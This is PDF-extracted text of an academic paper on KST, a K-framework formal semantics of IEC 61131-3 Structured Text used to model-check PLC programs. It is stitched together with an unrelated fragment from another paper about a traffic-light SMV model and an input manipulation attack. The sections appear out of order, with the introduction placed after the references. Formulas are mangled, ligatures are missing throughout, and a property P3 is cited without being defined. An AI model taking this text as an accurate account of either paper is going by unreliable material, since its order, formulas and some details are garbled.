GREEN: GREEN; 25 TRUE: {RED}; 26 esac; 2728 SPEC AG ! (light_NS = GREEN & light_EW = GREEN) Code 2: SMV for the traf c light program. Last, we use NuSMV to verify the property and obtain the following counterexample.->State: 1.1 <- light_NS = GREENlight_EW = RED ->Input: 1.2 <- button_NS = FALSE button_EW = FALSE sensor_NS = FALSE sensor_EW = TRUE ->State: 1.2 <- light_NS = YELLOW ->Input: 1.3 <- sensor_EW = FALSE ->State: 1.3 <- light_NS = RED ->Input: 1.4 <- ->State: 1.4 <- light_NS = GREENlight_EW = GREEN Listing 1: A counterexample from the formal veri cation. Listing 1shows that the initial state (State 1.1) has NS light of green and EW light of red. Then, in State 1.2, the program receives an input of True SensorEW , so the NS light switches to yellow. Next, in State 1.3, the inputof SensorEW changes to False, but the NS light still has to change from yellow to red. Finally, in State 1.4, theEW light switches to green due to an earlier emergencyrequest ( T rue SensorEW ) in State 1.2, while the NS light also switches to green since the emergency request hasbeen cleared ( F alse SensorEW ) in State 1.3. From the above counterexample, the input manipu- lation attack in Section A.2 is revealed. To prevent this attack, one can either forbid the input pattern of the coun-terexample, or redevelop the ST program accordingly. 402 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply.
KST_Executable_Formal_Semantics_of_IEC_61131-3_Structured_Text_for_Verification.pdf
Programmable logic controllers (PLCs) are special purpose computers designed to perform industrial automation tasks. They require highly reliable control programs, particularly when used in safety- critical systems such as nuclear power stations. In the development of reliable control programs, formal methods are ``highly recommended'' because the correctness of intended programs can be mathematically proven. Formal methods generally require precise semantics indicating how the program behaves during execution. However, for PLC programming languages, formal semantics is not always available rendering the application of formal methods highly challenging. In this paper, we present formal operational semantics of structured text , a widely used PLC programming language. The semantics is based on the ST language spec- i cation provided by IEC 61131-3, a generally acknowledged international standard for PLCs. We de ne the formal semantics in Kwhich is a rewriting-based semantic framework and has been successfully applied in de ning the semantics of many general-purpose programming languages such as C [1] and, Java [2]. We validate our formal semantics by testing examples from the standard and then apply the semantics on the veri cation of control programs for PLCs. syntax tree obtained by parsing the input PLC program and identi es all POU declarations (in the kcell) sequentially. This phase is further divided into two steps, as shown in Figure 6. In the rst step, multiple poucells are created, and each corresponds to a POU declaration. Cells that nest in pouare then populated based on the information about the POU. In the second step, KST creates an instance (denoted by a inscell) for every PG and FC. Details are discussed in Section 4.3.1 by using semantic rules for the declaration of POUs. In addition, identi ers of PG instances are collected into thepgscell, which is sent to the next phase. Initializing phase . An initializing phase occurs after preprocessing. In this phase, KST iterates over PG instances on the basis of their identi ers stored in the pgscell and allocates memory for its variables based on the declaration of variables. If a variable is declared as an FB instance, an instance of the FB is created, and the memory is allocated with variables of the created instance. This phase continues until all instances are created and the memory has been allocated with their variables. 14596 VOLUME 7, 2019 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification TABLE 1. The syntax of ST in IEC 61131-3. FIGURE 6. The workflow of KST. Scan cycle . The actual execution of the PLC program, following cyclic scanning, occurs during this phase. As depicted in Figure 6, this phase is subdivided into three steps, each of which correspondings to a phase in the scan cycle (as shown in Figure 2). In the rst step, input signals are taken from the incell and are stored into corresponding storage locations. In the second step, KST sequentially executes PG instances in pgsand updates related storage contents on the basis of the prede nedcontrol algorithm (i.e., its statements) and current value of input variables. In the third step, the values of output variables are appended to the outcell. This phase is repeated and never be terminated. 1) POU DECLARATION As previously discussed, POU declaration constructs are identi ed by KST in the preprocessing phase. The semantic rule for the declaration of a function block type POU is shown in (2), as shown at the bottom of this page. As explained in Section IV-A, meaning of the aforemen- tioned semantic rule is not dif cult to understand. That is, the top computation in kis consumed, a new poucell is created based on the top computation and is added to the pous cell during preprocessing. If the identi ed construct is the declaration of a program-type POU, except for rewriting in (2), KST also creates a single instance for it and records its identi er in the pgscell. That is, * :K h:MapiiEnvh:MapiiInshNameiiTypehIiiId ins I IC1 nId inss :K ListItem (I) pgs FUNCTION_BLOCK Name Vars Stmts END_FUNCTION_BLOCK :K k * :K hNameipNameh:KipRethVarsipVarshStmtsipStmts pou+ pous hpreprocessingiphase (2) VOLUME 7, 2019 14597 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification where ListItem(I) is a built-in method of Kthat used to create a list item. If the top computation in the kcell is the declaration of a function-type POU, KST also creates a single instance for it. Moreover, KST allocates memory for its variables by rewriting the top computation into an auxiliary function alloc(Name ,I,RT). Notably, an additional variable bearing the same name as that of the function is added and is used to store its return value. 2) VARIABLE DECLARATION In ST, the declaration of variables is a construct start- ing with the keywords ``V AR_INPUT'', ``V AR_OUTPUT'', ``V AR_IN_OUT'', ``V AR_EXTERNAL'', ``V AR_TEMP'', ``V AR'', ``V AR_GLOBAL'' (indicates the category of a vari- able) and ending with the key word ``END_V AR''. After preprocessing, KST iterates over the instances of programs in thepgscell and allocates memory for variables on the basis of variable declaration constructs. For example, (3) shows the semantic rule for the input variable declaration construct. V AR_INPUT X : T := V; END_V AR :K k  :K L7!input catg  :K X7!L iEnvhIiiId ins :K L7!V store  L LC1 nLoc :K L7!T typehIipidhinitializingiphase (3) Variables can be declared within the ``V AR ... END_V AR'' construct to become constants by using the quali er ``CONSTANT.'' KST then populates the cnst cell with the new mapping L7!1, denoting the value in location Lis a constant. In addition to being declared as a primitive type such as ``BOOL'', ``INT'', a variable can also be declared as an instance of a function block type POU. The corresponding semantic rule is shown in (4). V AR X : FBName := (Params); END_V AR alloc(Vars;J)yinit(Params ;J) khIipid * :K h:MapiiEnvh:MapiiInshFBNameiiTypehJiiId ins  J JC1 nId inss  :K X7!J iInshIiiId ins  hFBNameipNamehVarsipVars pou hinitializingiphase (4) In accordance with the aforementioned semantic rule, KST rst creates an instance of the function block type POU, and a new mapping from the variable name to the instance identi er is added into the iInscell of the current instance.KST then allocates memory for variables in the instance J recursively (denoted by alloc(Vars,J)) and initializes some input variables on the basis of the parameter assignment list Params . 3) SCAN CYCLE KST has implemented a particular ``cyclic scanning'' mech- anism, which enables the interpreter derived from KST to execute ST programs in the PLC manner. After initialization, KST enters the scanning cycle phase, and the execution is repeated cyclically and never terminated. Semantic rule (5) shows the operations in the updating input phase, which _ denotes that the current value can be any. The semantic rule for the writing output phase is similar to (5) and thus is not presented here. Semantic rules describing operations in the executing program phase is discussed in Section IV-C.4. h:Kik InVListListItem (L;V;T1) :K in L7!_ L7!V store hL7!T2i typehL7!inputi catghupdating inputsiphase when size(In) >0 and T1 = T2 :K Is k updating intputs executing programs phasehInVListiinhIsipgs when size(In)=0 (5) 4) STATEMENTS We now discuss some semantic rules for statements. All semantic rules presented in this section describe operations during execution of programs phase; thus, we omit cell hiphase from following semantic rules. The lookup of a simple vari- able is given in Section IV-A. We present in this section the semantic rule for the lookup of a variable within an instance of the function block-type POU and omit its explanation. X.Var VVVT khhX7!Ji iInshIiiIdiinshL7!Ti type hhVar7!Li iEnvhJiiIdiinshL7!Vi storehIipid (6) The semantic rule for the assignment statement (e.g., X := Exp;) is shown in (7). The assign operator ``:='' is given the strictness attribute (evaluation strategies) ``[strict(2)]'' to ensure an appropriate evaluation order. That is, the right-hand side of an assignment is to be evaluated before the assignment can be executed. When the assignment rule is red, the right- hand side becomes a value of the form ``V :: T''. X := V :: T1; :K k L7!_ L7!V storehX7!Lienv hL7!T2itypehL7!Cicnst when T1DgetType(T2) and C = 0 (7) The execution of an instance of a program-type POU is invoked by the PLC system implicitly. This process is handled in KST by iterating instances of program type POUs in the 14598 VOLUME 7, 2019 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification pgscell. Formally, I Stmts kD_ IE pidD_ EE env hEiiEnvhTiiTypehIiiId ins hTipNamehStmtsipStmts pou(8) Semantic rule (8) states that if the top computation is an identi er of an instance of a program type POU, KST loads its environment and then executes its statements. Execution of an instance of a function-type POU or a function block- type POU is invoked explicitly by the invocation statement. The semantic rule for the invocation statement of an instance of a function block-type POU is shown in (9). Name (Params) yRestVK initInputs (Params )yStmtsyassignOutputs (Params ) k  I J pid E E0 envhhName7!Ji iInshIiiIdiins hE0iiEnvhTiiTypehJiiId ins hTipNamehStmtsipStmts pou  :K ListItem (sf(Rest;I;E)) stack(9) The aforementioned semantic rule shows that the current instance I, its local environment and the rest of the compu- tations in kare saved to the runtime stack so that the calling routine can subsequently resume. Computations have a list structure, capturing the intuition of computation sequential- ization, with list constructor _ y_ (read ``followed by'') and unit ``.'' (the empty computation). The currently exe- cuted instance then changes to Jwhose local environment is loaded into the Envcell. J's input variables are initialized if it is speci ed in the parameter assignment list (i.e., Params ). KST then executes the statements of Jand assigns the value ofJ's output variables to variables of the calling routine if it is speci ed in Params . If the top computation is the invocation statement of a function, the operations to perform slightly vary from (9). A new auxiliary notation lookup (Name ;J) is appended to assignOutputs because the invocation of a function should be an operand of an expression. The invocation of a function yields a value in the form ``V :: T''. V. EVALUATION AND APPLICATION ON VERIFICATION In addition to formalizing the semantics of ST and thus providing a precise language reference model of ST, our secondary objective is to verify ST programs by using built-in tools provided by K. Before demonstrating how the tools can be used to verify ST programs, we rst present the evaluation of KST with respect to its conformance with the IEC 61131-3 standard. A. TESTING KST CONFORMANCE WITH THE STANDARD Kprovides various built-in tools that allow us to derive an interpreter from the semantics. To this end, we testedour semantics with a test suite from similar motives of [2], [20], and [23]. However, ST has no known available test suite. The IEC 61131-3 standard provides various exam- ples to demonstrate the semantics of ST language constructs. These examples were used in our evaluation as test cases for KST. Generally, the direct use of these examples is regarded as nontrivial. Most of them are code snippets, and some only consist of a single statement. Moreover, some of them have minor issues, such as the use of unspeci ed structure, which are xed by putting code snippets into the corre- sponding POU constructs or slightly modifying the original code. Finally, 13 function-type POUs, 38 function block- type POUs and 19 program-type POUs are obtained.1The evaluation result is shown in Table 2. TABLE 2. Evaluation result. KST passes 53 of the 70 tests from the IEC 61131-3 stan- dard. The failing tests contain the usage of unspeci ed stan- dard functions or standard function blocks, such as TON, SR, ADD, and so on. After supplying the implementation of these POUs, KST passes the remaining 17 tests. KST contains more than 550 semantic rules. Following previous studies [20], [22], we measured the semantic cov- erage of the tests, that is, the percentage of the semantic rules exercised by all test cases. The test from the IEC 61131-3 standard covers under 50% of the semantic rules. Many fea- tures of ST are missed. Therefore, we hand-craft 14 program- type POUs as tests during our evaluation. All 84 tests including tests from IEC 61131-3 cover all semantic rules in KST. All experiments are run on a machine running 64-bits Windows 10 Professional operation system with Intel(R) Core(TM) i5-4590 CPU 3.30GHz and 16GB DDR3 1333MHz RAM. Each test takes 4.6s on average to complete, excluding the startup time of K(about 8s). B. LINEAR TEMPORAL LOGIC MODEL CHECKING This section presents a case study to show an application of KST in verifying ST programs. We demonstrate model checking of Linear temporal logic (LTL) properties. The industrial control system used as case study is the sorting and packing station (SPS) from a pinion product line. SPS provides a function for sorting and packing pinions of 1https://github.com/samson-bu/kst/tree/master/tests VOLUME 7, 2019 14599 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification FIGURE 7. Scheme of the sorting and packing station. different materials, schematically represented in Figure 7. The automation of SPS is operated by Modicon M340 PLC from Schneider Electirc.2As shown in Figure 7, SPS has three subsystems: the transporting system that consists of several conveyors (e.g., C_1, C_2 and C_3) and correspond- ing motors with a single direction of movement (C_1_D, C_2_R and C_3_R); the sorting system that consists of sev- eral robotic arms (e.g., RA_1 and RA_2) and various sensors; the packing system that consists of metal trays and sealing machine (not shown in Figure 7). The workpieces of different materials are transported by a linear conveyor (C_1) driven by a unidirectional motor (C_1_M) moving in one direction (C_1_D). They rst reach a scanning position that has a sensor (S_P_S) to detect the pres- ence of the pinion and two other sensors (S_M1 and S_M2) to detect what kind of material is used. The detected informa- tion is forwarded to the control program; thus, the pinion is transported to the right conveyor (e.g., C_2 or C_3). The intended behavior for the robotic arm RA_1 is simple: When the sensor S_P_S detects a pinion, RA_1 must move left to the position ``left'' and then transports the pinion to the conveyor C_2. RA_1 is represented by an instance of the function block-type POU RA_CL which has 5 input variables, 6 output variables and 4 internal variables. Two properties summarized from the real speci cation of SPS are listed. P1: To ensure a pinion can be picked up by a robotic arm normally, the conveyor C_1 must stop when the pinion reaches the scanning position (i.e., S_P_S is true). The property P1is expressed as the LTL formula (C_1_D[S_P_S), where indicates ``always,'' [indicates ``Until''. P2: When a pinion is identi ed as type 1 (i.e., S_P_S1 & S_M1 = TYPE1), RA_1 goes left, down and then 2https://www.schneider-electric.cn/zh/picks up the pinion. The property P2is expressed as the LTL formula ((BOC^S_P_S1^S_M1)! (EOC^RA_1.M_L^(EOC^RA_1.M_D))), where indicates ``eventually''. In the formula, BOC and EOC are Boolean symbols, which evaluate to true only at the beginning and end of each scan cycle respectively. In addition to RA_CL, the control program has a function block type POU called EmergencyStop, which has ve input variables, four output variables and a single internal variable. EmergencyStop is safety-related function block for monitor- ing an emergency stop button; thus, its output EStopOut must be set as true or false for emergency switch off functionality in a safety-critical systems. EmergencyStop is implemented in ST with more than 100 lines of code. A careless programmer may still hide a defect in his implementation. By using built-in tools provided by K, the aforementioned properties can be veri ed using the following command: krun SPS.st ltlmc LTL-Formula The option ``ltlmc'' indicates that a speci ed program (e.g. SPS.st) is model-checked with the following LTL for- mula. The Kframework returns veri cation results by exe- cuting the aforementioned command. The basic idea of the formal veri cation is to explore the state space of an applica- tion by executing it on the derived interpreter which checking if the speci ed property is violated. If violation exists, a coun- terexample of the property is found; otherwise, the property is veri ed true. The veri cation of the property P2yields a counterexam- ple, indicating that the property is not satis ed. Carefully inspecting the implementation of SPS, we notice that the program controls RA_1 to move down and forgets to test whether RA_ reaches the position ``left.'' This bug is xed and then P2is veri ed. The veri cation of P1takes about 7s, P2about 15s and P3about 4.5s to complete. VI. RELATED WORK Formal semantics research for real programming languages has to be the focus both in the industry and academia. Owing to space restriction, this section only presents large semantics inKand other studies closely related to the veri cation of PLC programs. A. OTHER SEMANTICS IN K TheKframework has been successfully used in de ning semantics for several programming languages such as C, Java, and JavaScript, among others. We present an overview of this work brie y because of space limitations. Refer- ence [1] describes an executable formal semantics of C, which has been thoroughly tested using GCC torture test suite and 99.2% are passed. A further study [23] de nes the ``negative'' semantics of C11 such that the semantics can reject unde ned programs. Reference [2] presents com- plete executable formal semantics of Java 1.4, called K-Java. It also develops a test suite alongside the development of K-Java, following the test driven development. K-Java has 14600 VOLUME 7, 2019 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification been extensively tested using the developed test suite. Ref- erence [20] provides formal semantics of JavaScript, which has passed all 2782 tests in the ECMAScript 5.1 conformance test suite. Some studies targeting new languages such as Ethereum Virtual Machine (KEVM [24]) and P4 (P4K [22]), have recently been published. These languages remain in the early stages of language design and are relatively unstable. Many problems in their speci cations have been revealed through the development of their semantics in K. ST is a PLC domain-speci c programming language; thus, speciali- ties of the PLC domain, such as the cyclic scanning executing mechanism, are considered in ST formalization. Therefore, the interpreter derived from our semantics can execute ST programs in PLC manner. B. VERIFICATION OF PLC PROGRAMS Several studies have been conducted to verify PLC programs by using formal methods such as model checking. Refer- ence [25] presents a survey that summarizes model checking practices in the veri cation of PLC systems. PLC pro- grams written in IEC 61131-3 programming languages or their dialects are abstracted to automata, Petri-nets, or other state-based transition systems. Veri cation is then gener- ally conducted using existing model checking tools, such as SPIN [26], SMV [27], UPPAAL [28], [29], and so on or by self-developed model checkers like PLCverif [30], Arcade.PLC [31], and so on. However, the limitation of these studies is the lack of formal semantics of the PLC pro- grams themselves. To address this problem, several studies concerning the formal semantics of PLC programming lan- guages have been proposed. For example, [6], [8], [10], [12] present the formal semantics of IL, a simple assembly- like language within the IEC 61131-3 standard. Refer- ences [10], [32], and [33] provide the formal semantics of sequential function chart, a special-purpose language for con- structing complex PLC applications. Reference [18] de nes small-step operational semantics for SCL which is offered by Siemens and is a dialect of ST within IEC 61131-3. However, to the best of our knowledge, no additional stud- ies have focused on the formal semantics of ST. In this current study, we de ne the formal semantics of ST in the Kframework. VII. CONCLUSION AND FUTURE WORK This paper study presents executable formal semantics of the ST language. The semantics (called KST) is formalized from the speci cation in IEC 61131-3, which is a widely accepted international standard for PLC. KST covers most key features of ST de ned in the second edition of IEC 61131-3, such as common programming concepts, program organization units, and particularly, the cyclic scanning execution mech- anism. We systematically test KST by using examples from IEC 61131-3 and several hand-crafted examples. We formally verify an industrial manufacturing application by using KST and built-in tools provided by K, which demonstrates the usefulness of our formal semantics.Our semantics is the formalization of the speci cation of ST in the second edition of IEC 61131-3 because many industrial programs are developed in this version. Moreover, IEC 61131-3 is still evolving, and new features continue to emerge. For example, the third edition (proposed in 2012) incorporates object-oriented principles into PLC program- ming. Fortunately, KST is modular and thus can be easily extended without modifying previously de ned semantics. Therefore, we intend to extend KST with semantics for new features introduced by the new version in the near future. We believe that the extension will be straightforward because the third edition of IEC 61131-3 is fully upwards compatible with the second edition. The object-oriented feature of Java is dis- cussed in [2], providing a reference for future related studies. REFERENCES [1] C. Ellison and G. Rosu, ``An executable formal semantics of C with appli- cations,'' ACM SIGPLAN Notices , vol. 47, no. 1, pp. 533544, Jan. 2012. [2] D. Bogdanas and G. Ro u, ``K-Java: A complete semantics of Java,'' inACM SIGPLAN Notices , vol. 50, no. 1, pp. 445456, 2015. [3] C. Baier and J.-P. Katoen, Principles of Model Checking . Cambridge, MA, USA: MIT Press, 2008. [4] D. Darvas, B. F. Adiego, A. V r s, T. Bartha, E. B. Vi uela, and V. M. G. Su rez, ``Formal veri cation of complex properties on PLC programs,'' in Proc. Int. Conf. Formal Techn. Distrib. Objects, Compon., Syst. Berlin, Germany: Springer, 2014, pp. 284299. [5] D. Darvas, E. B. Vi uela, and I. Majzik, ``What is special about PLC software model checking?'' in Proc. 16th Int. Conf. Accel. Large Exp. Phys. Control Syst. , Barcelona, Spain, Oct. 2017, p. THPHA159. [6] A. Mader and H. Wupper, ``Timed automaton models for simple pro- grammable logic controllers,'' in Proc. IEEE 11th Euromicro Conf. Real- Time Syst. , Jun. 1999, pp. 106113. [7] R. Huuck, ``Software veri cation for programmable logic controllers,'' Ph.D. dissertation, Inst. Comput. Sci. Appl. Math., Univ. Kiel, Kiel, Germany, 2003. [8] R. Huuck, ``Semantics and analysis of instruction list programs,'' Electron. Notes Theor. Comput. Sci. , vol. 115, pp. 318, Jan. 2005. [9] S. O. Biha, ``A formal semantics of PLC programs in Coq,'' in Proc. IEEE 35th Annu. Comput. Softw. Appl. Conf. (COMPSAC) , Jul. 2011, pp. 118127. [10] J. O. Blech and S. O. Biha, ``Veri cation of PLC properties based on formal semantics in Coq,'' in Proc. Int. Conf. Softw. Eng. Formal Methods . Berlin, Germany: Springer, 2011, pp. 5873. [11] R. Wang, Y. Guan, L. Liming, X. Li, and J. Zhang, ``Component-based formal modeling of PLC systems,'' J. Appl. Math. , vol. 2013, Feb. 2013, Art. no. 721624. [12] J. O. Blech and S. O. Biha. (2013) ``On formal reasoning on the semantics of PLC using Coq.'' [Online]. Available: https://arxiv.org/abs/1301.3047 [13] N. Bauer, R. Huuck, B. Lukoschus, and S. Engell, ``A unifying semantics for sequential function charts,'' in Integration of Software Speci cation Techniques for Applications in Engineering . Berlin, Germany: Springer, 2004, pp. 400418. [14] J. O. Blech. (2011). ``A tool for the certi cation of PLCs based on a Coq semantics for sequential function charts.'' [Online]. Available: https://arxiv.org/abs/1102.3529 [15] O. Rossi and P. Schnoebelen, ``Formal modeling of timed function blocks for the automatic veri cation of ladder diagram programs,'' in Proc. 4th Int. Conf. Autom. Mixed Processes, Hybrid Dyn. Syst. (ADPM) , Dortmund, Germany, 2000, pp. 177182. [16] H. B. Mokadem, B. B rard, V. Gourcuff, O. De Smet, and J.-M. Roussel, ``Veri cation of a timed multitask system with uppaal,'' IEEE Trans. Autom. Sci. Eng. , vol. 7, no. 4, pp. 921932, Oct. 2010. [17] H. Barbosa and D. D harbe, ``Formal veri cation of PLC programs using the b method,'' in Proc. Int. Conf. Abstract State Mach., Alloy, B, VDM, Z . Berlin, Germany: Springer, 2012, pp. 353356. [18] D. Darvas, I. Majzik, and E. B. Vi uela, ``PLC program translation for veri cation purposes,'' Periodica Polytechn. Elect. Eng. Comput. Sci. , vol. 61, no. 2, pp. 151165, 2017. VOLUME 7, 2019 14601 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification [19] International Standards, Part 3: Programming Languages , document IEC 61131, 2003. [Online]. Available: http://www.plcopen.org/pages/ tc1_standards/iec_61131_3/ [20] D. Park, A. Stef nescu, and G. Ro u, ``KJS: A complete formal semantics of JavaScript,'' ACM SIGPLAN Notices , vol. 50, no. 6, pp. 346356, 2015. [21] A. Stef nescu, D. Park, S. Yuwen, Y. Li, and G. Ro u, ``Semantics-based program veri ers for all languages,'' ACM SIGPLAN Notices , vol. 51, no. 10, pp. 7491, 2016. [22] A. Kheradmand and G. Ro u. (2018). ``P4K: A formal semantics of P4 and applications.'' [Online]. Available: https://arxiv.org/abs/1804.01468 [23] C. Hathhorn, C. Ellison, and G. Ro u, ``De ning the unde nedness of C,'' ACM SIGPLAN Notices , vol. 50, no. 6, pp. 336345, 2015. [24] E. Hildenbrandt et al. , ``KEVM: A complete formal semantics of the ethereum virtual machine,'' in Proc. IEEE 31st Comput. Secur. Found. Symp. (CSF) , Oxford, U.K., Jul. 2018. [25] T. Ovatman, A. Aral, D. Polat, and A. O. nver, ``An overview of model checking practices on veri cation of PLC software,'' Softw. Syst. Model. , vol. 15, no. 4, pp. 937960, 2016. [26] T. Mertke and G. Frey, ``Formal veri cation of PLC programs generated from signal interpreted Petri nets,'' in Proc. IEEE Int. Conf. Syst., Man, Cybern. , vol. 4, Oct. 2001, pp. 27002705. [27] G. Canet, S. Couf n, J.-J. Lesage, A. Petit, and P. Schnoebelen, ``Towards the automatic veri cation of PLC programs written in instruction list,'' inProc. IEEE Int. Conf. Syst., Man, Cybern. , vol. 4, Oct. 2000, pp. 24492454. [28] H. Dierks, ``PLC-automata: A new class of implementable real-time automata,'' in Proc. Int. AMAST Workshop Aspects Real-Time Syst. Con- current Distrib. Softw. Berlin, Germany: Springer, 1997, pp. 111125. [29] H. Willems, ``Compact timed automata for PLC programs,'' Koninklijke Philips Electron. N.V, Nat. Lab. Unclassi ed Rep. 830/99, 1999. [30] D. Darvas, E. B. Vinuela, and B. F. Adiego, ``PLCverif: A tool to verify PLC programs based on model checking techniques,'' in Proc. 15th Int. Conf. Accel. Large Exp. Phys. Control Syst. , Melbourne, VIC, Australia, Oct. 2015, p. WEPGF092. [31] S. Biallas, J. Brauer, and S. Kowalewski, ``Arcade.PLC: A veri cation platform for programmable logic controllers,'' in Proc. 27th IEEE/ACM Int. Conf. Autom. Softw. Eng. , Sep. 2012, pp. 338341. [32] S. Bornot, R. Huuck, Y. Lakhnech, and B. Lukoschus, ``An abstract model for sequential function charts,'' in Discrete Event Systems . Boston, MA, USA: Springer, 2000, pp. 255264. [33] S. Bornot, R. Huuck, B. Lukoschus, and Y. Lakhnech, ``Veri cation of sequential function charts using SMV,'' in Proc. Int. Conf. Parallel Distrib. Process. Techn. Appl. (PDPTA) , Las Vegas, NV, USA, 2000. YANHONG HUANG was born in Neijiang, Sichuan, China, in 1986. She received the B.S. degree in software engineering and the Ph.D. degree in computer science from East China Normal University, Shanghai, China, in 2009 and 2014, respectively, where she has been with the School of Computer Science and Software Engi- neering, as an Assistant Researcher, since 2014. In 2012, she was a Research Student with Teesside University, U.K. Her research interests include formal method, semantics theory, and analysis and veri cation of embedded systems and industry software. Her awards and honors include the national scholarship, in 2013, the IBM China excellent students, in 2013, and Shanghai excellent graduates, in 2009 and 2014. XIANGXING BU was born in Heze, Shandong, China, in 1992. He received the B.S. degree from Shandong Agricultural University, Tai'an, Shandong, China, in 2015. He is currently pursu- ing the M.S. degree in software engineering with East China Normal University, Shanghai, China. His research interests include the veri cation of industry control programs and model checking. GANG ZHU received the B.S. degree from the University of Shanghai for Science and Technol- ogy, Shanghai, China, in 2017. He is currently pursuing the M.S. degree in software engineering with East China Normal University, Shanghai. Since 2017, he has been a Research Assistant with the National Trusted Embedded Software Engineering Center, Shanghai. His research inter- ests include the operational semantics of program- ming language and software component model with the application in the industrial eld. XIN YE received the B.S. degree in software engineering from East China Normal Univer- sity, Shanghai, China, in 2013. She was enrolled in the Master-Doctoral program of East China Normal University, in 2013. She is current pur- suing the Joint Ph.D. degree between East China Normal UniversityParis Diderot Univeristy, Paris, France. Her research interests include program analysis and veri cation such as using model checking to verify binary codes, behavior analysis using logics, for instance, and malware detection. Ms. Ye's awards and honors include the Chinese Government Scholarship. XIAORAN ZHU received the B.S. degree in soft- ware engineering from East China Normal Uni- versity, Shanghai, China, in 2010, where she is currently pursuing the Graduate degree with the School of Computer Science and Software Engi- neering. Her research interests include program- ming languages and formal methods. JIANQI SHI was born in Tianjin, China, in 1984. He received the B.S. degree in software engineer- ing and the Ph.D. degree in computer science from East China Normal University, Shanghai, China, in 2007 and 2012, respectively, where he is currently with the School of Computer Sci- ence and Software Engineering, as an Associate Researcher. From 2012 to 2014, he was a Researcher Fellow with the National University of Singapore. More- over, in 2014, he was a Research Scientist with the Temasek Laboratory, under the Ministry of Defense of Singapore. His research interests include formal method, formal modeling, and veri cation of real-time or control systems, and IEC 61508 and IEC 61131 standards. His awards and honors include the Shanghai Science and Technology Committee Rising-Star Pro- gram, in 2018, and the ACM and CCF nomination of excellent doctor in Shanghai, in 2014. 14602 VOLUME 7, 2019
Received December 19, 2018, accepted January 10, 2019, date of publication January 21, 2019, date of current version February 8, 2019. Digital Object Identifier 10.1 109/ACCESS.2019.2894026 KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification YANHONG HUANG 1, XIANGXING BU2, GANG ZHU2, XIN YE2, XIAORAN ZHU 2, AND JIANQI SHI3 1Shanghai Key Laboratory of Trustworthy Computing, East China Normal University, Shanghai 20062, China 2National Trusted Embedded Software Engineering Technology Research Center, East China Normal University, Shanghai 20062, China 3Hardware/Software Co-Design Technology and Application Engineering Research Center, East China Normal University, Shanghai 20062, China Corresponding author: Jianqi Shi ([email protected]) This work was supported in part by the Shanghai Science and Technology Committee Rising-Star Program under Grant 18QB1402000, and in part by the National Natural Science Foundation of China under Grant 61602178. INDEX TERMS Formal veri cation, Kframework, operational semantics, programmable logic controller. I. INTRODUCTION PLCs are special-purpose computers designed for industrial automation control. They have been widely adopted as central controllers for many safety-critical systems, such as nuclear power stations. Traditionally, in ensuring the quality of PLC's control program, intensive testing is performed to reveal as many defects as possible. However, testing has several disad- vantages, such as the inability to ensure the absence of defects and to provide information about the defects that have yet to be uncovered. Thus, testing is less than ideal for safety- critical applications. Consequently, wide-scale research has been intensi ed, aimed at improving the reliability of PLC programs. An active topic is the formal veri cation of PLC programs. One of the most widely known formal veri cation techniques is model checking [3]. Model checking allows us to prove the correctness or incorrectness of the intended PLC programs with respect to a certain formal speci cation or property. Accordingly, model checking is highly recom- mended when developing safety-critical applications [4].Model checking shows potential; however, this method has not been ``easy-to-use or part of the state of the prac- tice of PLC program development'' [5]. In our argument, the dif culties of using model checking in the PLC domain are twofold: First, effort to perform model checking is non- trivial because both a formal model of the intended PLC program and formal properties need to be created. Second, PLC programs can be developed using various program- ming languages which generally have no precisely de ned semantics [5]. The rst dif culty is traditionally addressed rst by the cooperation between control engineers and for- mal methods experts. However, this traditional practice has several issues for instance, potential misunderstandings of program behaviors may lead to the incorrect creation of the formal model. Thus, automated model checkers that directly generate a formal model from PLC programs are needed. Developing such tools requires precisely de ned semantics of the implemented language. The second dif culty renders the development process challenging. Thus, a large body VOLUME 7, 20192169-3536 2019 IEEE. Translations and content mining are permitted for academic research only. Personal use is also permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.14593 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification of research has focused on providing formal semantics for a speci c PLC programming language [6][18]. However, only [17] provides formal semantics for a subset of Structured Text (ST), which is a widely used programming language pro- vided by the IEC 61131-3 standard. In addition, [18] presents formal semantics for Structured Control Language (SCL) which is a variant of ST offered by Siemens. In the current study, we present formal operational seman- tics for the ST language. ST is a textual, high-level lan- guage [19] and has exclusive advantages in handling complex algorithms compared with other languages provided by the IEC 61131-3 standard. Thus it is often the preferred language for developing large-scale PLC programs. Moreover, ST is supported by most leading PLC vendors, such as Siemens, Beckhoff and Omron. The semantics presented in this study is based on the of cial ST language speci cation provided by the second edition IEC 61131-3 standard [19]. The semantics is formalized in K, a rewriting-based semantic framework. Khas been successfully applied in many programming lan- guages, such as Java [2], C [1], JavaScript [20], and so on. To the best of our knowledge, our formalization of the seman- tics of ST (called KST) covers most features of ST and the distinct characteristics of PLC such as the cyclic scan- ning execution mechanism. Further, KST has the following advantages: executable .Kprovides several built-in tools that allow us to derive an interpreter for ST programs, rendering KST executable. human-readable . KST encompasses the de nition of syntax and semantics, which are compact and easily understood and accepted by everyone. modular . New language features can be added without the need to change the previous formalization of the language. The remainder of this paper is organized as follows: Section II provides a brief overview of PLC and programming concepts de ned in IEC 61131-3. Section III presents an overview of our formalization effort. Section IV describes the formal semantics of ST. Section V presents an evaluation of KST and an application of KST in the veri cation of ST programs. Section VI reviews related studies regarding big semantics in Kand veri cation of PLC programs. Section VII concludes this paper and offers directions for future work. II. PRELIMINARIES A. PROGRAMMABLE LOGIC CONTROLLER PLCs are special-purpose computers, which have been widely used in industrial automation. PLC's ability to process a large number of I/O is one of the key properties of PLC usage in the automation industry. For example, medium and large PLC could control a large number (>256) of discrete elements using very fast scan times. Figure 1 shows the key components of a typical PLC and their relationships. PLCs are normally connected to input/output peripherals through the input modules and output modules. The input module receives the signal from input devices, such as switches or FIGURE 1. Components of a typical PLC. FIGURE 2. The cyclic scanning execution 